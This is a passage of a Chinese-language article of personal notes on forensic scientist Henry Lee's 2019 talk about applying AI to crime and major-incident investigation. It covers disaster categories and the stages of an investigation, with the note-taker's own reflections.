  </h2><h2 style=""><span style="font-size:14.0pt;mso-bidi-font-size:14.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#276296;">AI Application in Major Incident Investigation</span>
  </h2><p style=""><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;">- </span><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;mso-ansi-language:EN-GB;">1. 40</span><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;">年巨变</span><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;mso-ansi-language:EN-GB;">:</span><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;">一个归国者眼中的中国蜕变</span><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;"></span></p><p style=""><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;">- </span><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;mso-ansi-language:EN-GB;">2. </span><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;">人工智能，中国有先机</span><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;"></span></p><p style=""><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;">- </span><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;mso-ansi-language:EN-GB;">3. AI: </span><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;">犯罪调查的全新视角</span><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;"></span></p><p style=""><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;">- </span><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;mso-ansi-language:EN-GB;">4. </span><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;">智慧城市与重大事故</span><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;mso-ansi-language:EN-GB;">:</span><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;">预防与应对的新思路</span><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;"></span></p><p style=""><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;">- </span><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;mso-ansi-language:EN-GB;">5. </span><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;">事故调查的全过程</span><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;"></span></p><p style=""><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;">- </span><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;mso-ansi-language:EN-GB;">6. </span><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;">事故预警与快速响应</span><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;mso-ansi-language:EN-GB;">:AI</span><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;">成为守护者</span><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;"></span></p><p style=""><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;">- </span><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;mso-ansi-language:EN-GB;">7. </span><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;">应急救援资源的智慧指挥官</span><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;mso-ansi-language:EN-GB;">:AI</span><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;">的妙用</span><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;"></span></p><p style=""><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;">- </span><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;mso-ansi-language:EN-GB;">8. </span><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;">物证管理与身份鉴定</span><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;mso-ansi-language:EN-GB;">:AI</span><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;">成为无声助手</span><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;"></span></p><p style=""><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;">- </span><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;mso-ansi-language:EN-GB;">9. </span><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;">从</span><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;mso-ansi-language:EN-GB;">911</span><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;">到马航的教训</span><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;mso-ansi-language:EN-GB;">:</span><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;">严谨鉴定的重要性</span><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;"></span></p><p style=""><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;">- </span><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;mso-ansi-language:EN-GB;">10. </span><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;">破案利器</span><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;mso-ansi-language:EN-GB;">:</span><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;">大数据、</span><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;mso-ansi-language:EN-GB;">AI</span><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;">与人类智慧的完美结合</span><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;"></span></p><p style=""><span style="font-size:8.0pt;mso-bidi-font-size:8.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;">* 根据FDF 2019李昌钰博士演讲整理的笔记，并非其官方讲稿，标题均自拟以方便大家阅读。当时他年过八旬，20多个小时的旅程到广州南沙，直接开讲，</span><span style="font-size:8.0pt;mso-bidi-font-size:8.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#FA0000;">声音洪亮，语速超快，风趣幽默，真乃神人也！</span><span style="font-size:8.0pt;mso-bidi-font-size:8.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;"></span></p><p style=""><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;">---</span></p><section style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;font-weight: normal;margin-top: 0pt;margin-bottom: 24px;"><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;">尊敬的各位嘉宾，大家好！</span></section><h2 style=""><span style="font-size:14.0pt;mso-bidi-font-size:14.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#276296;">1. 40年巨变:一个归国者眼中的中国蜕变</span>
  </h2><section style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;font-weight: normal;margin-top: 0pt;margin-bottom: 24px;"><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;">40年的改革开放，国家的发展真是突飞猛进。</span></section><section style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;font-weight: normal;margin-top: 0pt;margin-bottom: 24px;"><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;">我从第一次回国是在1985年，当时我回到我的家乡如皋，那个时候的如皋公安局还是个民房，现在的公安局非常现代化，简直让人不敢相信。</span></section><section style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;font-weight: normal;margin-top: 0pt;margin-bottom: 24px;"><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;">第一次到公安大学的时候，见到的都是很年轻的同学，现在他们大概都已经成为局长了。</span>    <o:page></o:page></section><section style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;font-weight: normal;margin-top: 0pt;margin-bottom: 24px;"><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;">最近，我看了一个纪录片，讲述了我们祖国40年里的翻天覆地的变化，当时上海唯一的饭店叫和平饭店，现在的上海变化之大，难以想象。南沙也是如此，从一个小城镇变成了一个繁华的、非常有活力的城市。</span></section><h2 style=""><span style="font-size:14.0pt;mso-bidi-font-size:14.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#276296;">2. 人工智能，中国有先机</span>
  </h2><section style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;font-weight: normal;margin-top: 0pt;margin-bottom: 24px;"><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;">人工智能是中国未来肯定领先的领域，它已经应用到医学、健康、社会、人类生活、国际资讯、通讯、经济等各个方面。人工智能和任何东西都密不可分，我们也一直在利用人工智能和犯罪做斗争，我们在美国也在研究人脸分析，美国的技术和国内相比是小巫见大巫，还是有很大的差距。</span></section><h2 style=""><span style="font-size:14.0pt;mso-bidi-font-size:14.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#276296;">3. AI: 犯罪调查的全新视角</span>
  </h2><h3 style=""><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#3C87CD;">人工智能在犯罪调查中的新概念</span>
  </h3><p style=""><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;">人工智能带来哪些犯罪调查的新概念？未来的新增报案要怎么样做？</span><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#FA0000;">Recognition &amp; collection of information最重要。</span><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;"></span></p><p style=""><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;">现在我们完全是靠个人的经验，将来AI逐步取代人力，能够到现场收集到很重要的信息，从现场、人证、物证、数据、资料库、公共信息、情报进行综合智能分析，找到嫌疑犯，并分析出他的动机、方式和机会。</span></p><p style=""><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;"><img class="rich_pages wxw-img" data-imgfileid="100000702" data-ratio="0.40841865756541523" data-type="png" data-w="879" height="167.99998474121094" style="color: rgb(0, 0, 0);font-family: &#34;微软雅黑 Light&#34;;font-size: 16px;letter-spacing: 0.578px;text-align: left;height: auto !important;" width="412.010009765625" src="https://wechat2rss.xlab.app/img-proxy/?k=8356b509&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FFStUibflSINxruVLbIyrOy0tpOq8qU5oA12azeia9SOovnLpfd03fxj9ApnaR5iaVlEDHdrNcA245GtcwcQibiaWiagw%2F640%3Fwx_fmt%3Dpng"/></span></p><h3 style=""><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#3C87CD;">综合智能分析的优势</span>
  </h3><p style=""><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;">这些信息主要来自于数据库，这些数据价值很高，但从安全考虑，普通大众无法使用，只有警方可以使用。所以，智能的难点是如何做分析？如何将这些大数据库连接起来？在中国可以容易实现，但在美国（因为法律法规）的效率很低。</span></p><section style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;font-weight: normal;margin-top: 0pt;margin-bottom: 24px;"><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;background:#FF00FF;mso-highlight:#FF00FF;">【思】现代刑事侦查，乃至各行各业，愈加依赖数据分析和信息整合</span><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;">。</span></section><h2 style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 18pt;font-family: 宋体;margin-top: 0pt;margin-bottom: 16px;"><span style="font-size:14.0pt;mso-bidi-font-size:14.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#276296;">4. 智慧城市与重大事故:预防与应对的新思路</span>
  </h2><h3 style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 13.5pt;font-family: 宋体;margin-top: 0pt;margin-bottom: 16px;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#3C87CD;">自然灾害和人为事故的分类</span>
  </h3><p style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;font-weight: normal;margin-top: 0pt;margin-bottom: 16px;"><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;">目前AI用在重大事故调查的很少，</span><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#FF0000;">假如人工智能能够处理事故善后，那AI就非常重要</span><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;">。</span></p><p style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;font-weight: normal;margin-top: 0pt;margin-bottom: 16px;"><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;">现在每个人都在讨论着智慧城市，智慧城市到底是什么？其中一项应该就是预防重大事故，重大事故发生了以后怎么处置？第一类是自然灾害，突发事故不是人为的，我们没有办法有很准确的预测，好像地震、龙卷风这些。美国最近大火，在加州 18 场，到现在有 1, 000 多人找不到， 5 万多个房子烧，但是我们怎么处理？到现在这些人怎么处理和居住？</span></p><p style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;font-weight: normal;margin-top: 0pt;margin-bottom: 16px;"><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;">第二类就是人为的事故，包括纵火、交通事故、重大谋杀案件、恐怖活动、示威，交通飞机失事等。</span></p><h3 style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 13.5pt;font-family: 宋体;margin-top: 0pt;margin-bottom: 16px;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#3C87CD;">人工智能在事故预防和处置中的潜力</span>
  </h3><p style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;font-weight: normal;margin-top: 0pt;margin-bottom: 16px;"><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;">怎么完成事故调查处理的闭环？</span><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#FF0000;">如果一个人工智能的系统能够在这么多场景下发挥作用，那我想对于人类社会就做了很大的贡献</span><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;">。</span></p><section style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;font-weight: normal;margin-top: 0pt;margin-bottom: 16px;"><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;">这要包括什么场景呢？重大事故发生，不管自然或者人为，医疗急救、传染病控制、生还者安抚、经济财产损失、法律责任、民事通告、后勤、保险，舆情管控、灾后重建，灾后社会秩序维稳（美国灾后抢劫多），需要有个 package （个人理解是综合性解决方案，包括但不限于先进的智能软件系统、专业的分析工具、标准化的工作流程以及专家支持服务）能够收集很多证据，综合协调、系统性地协助处理。这个领域的应用，不单是政府的应用，而且是商业的机会。</span>    <o:page></o:page></section><section style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;font-weight: normal;margin-top: 0pt;margin-bottom: 16px;"><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;background:#FF00FF;mso-highlight:#FF00FF;">【思】AI能形成解决方案、能形成服务么？悲悯之心会引出好的方案和服务，技术思维不一定。</span><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;"></span></section><h2 style=""><span style="font-size:14.0pt;mso-bidi-font-size:14.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#276296;">5. 事故调查的全过程</span>
  </h2><p style=""><span style="font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;"><img class="rich_pages wxw-img" data-imgfileid="100000683" data-ratio="0.39737991266375544" data-type="png" data-w="458" height="163.33999633789062" width="410.010009765625" style="height: auto !important;" src="https://wechat2rss.xlab.app/img-proxy/?k=f5befb86&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FFStUibflSINxruVLbIyrOy0tpOq8qU5oAzyRus2Ixm49pS6K7oqyibkLznbbIMJcqF6rhbrnQa8Pg3PqO3VfJkwQ%2F640%3Fwx_fmt%3Dpng"/></span><span style="font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;"></span></p><section style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;font-weight: normal;margin-top: 0pt;margin-bottom: 24px;"><span style="font-size:11.0pt;mso-bidi-font-size:11.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#000000;">事故调查主要有哪些阶段？重大事故我一生协助调查过很多个案件，包括纽约911，南斯拉夫战争，南美洲天然事故、还有美国警察跟民众的冲突等等。所以通常一个突发事件发生了，incident occur；接着下来就是 initial notification， 回应报案；我们尽快到现场，按照response procedure快速展开这个救援的工作；接下来是containment &amp; rescue，像化学危险品不能给它再继续扩散；还有现场保护、调查、受害者、目击者、嫌疑人信息，现场重建，找出嫌疑人，然后 clean up &amp; release，最后是经验教训总结。时间关系，挑一小部分讲。</span></section><h2 style=""><span style="font-size:14.0pt;mso-bidi-font-size:14.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#276296;">6. 事故预警与快速响应:AI成为守护者</span>
  </h2><h3 style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 13.5pt;font-family: 宋体;margin-top: 0pt;margin-bottom: 8px;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;font-variant:normal;text-transform:none;color:#3C87CD;">事故指标的识别</span>
